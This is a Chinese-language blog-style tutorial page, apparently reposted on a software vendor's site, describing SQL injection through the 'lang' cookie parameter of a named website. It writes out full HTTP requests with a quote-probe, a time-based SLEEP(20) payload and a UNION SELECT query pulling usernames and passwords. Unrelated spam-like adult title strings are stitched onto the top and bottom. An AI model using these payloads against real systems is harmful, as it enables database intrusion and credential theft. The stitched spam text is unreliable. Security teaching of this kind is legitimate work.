亚洲一区色图,青青福利,国产高清片

通過cookie中的參數(shù)所引發(fā)的sql注入

當(dāng)前位置：點(diǎn)晴教程→知識(shí)管理交流 →『技術(shù)文檔交流』

admin

2024年7月20日 21:33 本文熱度 692

通過cookie中的參數(shù)所引發(fā)的sql注入

前言

在請(qǐng)求的cookie參數(shù)中，有一個(gè)名為lang的參數(shù)存在SQL注入漏洞。

在這個(gè)參數(shù)中注入一個(gè)單引號(hào)（'）時(shí)，會(huì)引發(fā)SQL語(yǔ)法錯(cuò)誤；而注入第二個(gè)單引號(hào)后，錯(cuò)誤會(huì)消失。這表明參數(shù)中的輸入沒有正確地進(jìn)行轉(zhuǎn)義或過濾，從而使得惡意的SQL代碼得以執(zhí)行。

正文

正常情況下和受到攻擊時(shí)的請(qǐng)求示例：

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

受到sql注入攻擊時(shí)候的請(qǐng)求

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en'; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

報(bào)錯(cuò)如下：

當(dāng)然也可以使用查詢語(yǔ)句：

'%2b(select*from(select(sleep(20)))a)%2b'

將構(gòu)造好的查詢注入到原始的HTTP請(qǐng)求中，發(fā)送給目標(biāo)服務(wù)器。注入點(diǎn)是請(qǐng)求的cookie參數(shù)lang：


GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en%2b(select*from(select(sleep(20)))a)%2b; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

發(fā)送請(qǐng)求后，觀察服務(wù)器的響應(yīng)時(shí)間。如果服務(wù)器在處理請(qǐng)求時(shí)出現(xiàn)明顯的延遲（如20秒），則表明注入的查詢被服務(wù)器執(zhí)行了。這個(gè)時(shí)間延遲是由SQL中的SLEEP(20)函數(shù)引起的。

確認(rèn)sql注入存在以后 ,進(jìn)行漏洞利用

攻擊者可以構(gòu)造各種惡意SQL查詢來(lái)竊取或修改數(shù)據(jù)。例如，通過以下查詢來(lái)竊取用戶信息：

' UNION SELECT username, password FROM users --

發(fā)送惡意請(qǐng)求攻擊者將惡意查詢注入到lang參數(shù)中，并發(fā)送請(qǐng)求：

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en' UNION SELECT username, password FROM users -- ; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1

攻擊者檢查服務(wù)器的響應(yīng)，查看是否包含用戶數(shù)據(jù)。如果成功，攻擊者就能夠獲取數(shù)據(jù)庫(kù)中的敏感信息。

該文章在 2024/7/23 21:39:14 編輯過

關(guān)鍵字查詢

注入

參數(shù)

通過

相關(guān)文章

[待回復(fù)]通過cookie中的參數(shù)所引發(fā)的sql注入

點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。

點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理，結(jié)合碼頭的業(yè)務(wù)特點(diǎn)，圍繞調(diào)度、堆場(chǎng)作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體，是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。

點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。

點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi)，不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。

欧美成人精品手机在线观看_69视频国产_动漫精品第一页_日韩中文字幕网 - 日本欧美一区二区

通過cookie中的參數(shù)所引發(fā)的sql注入

前言

正文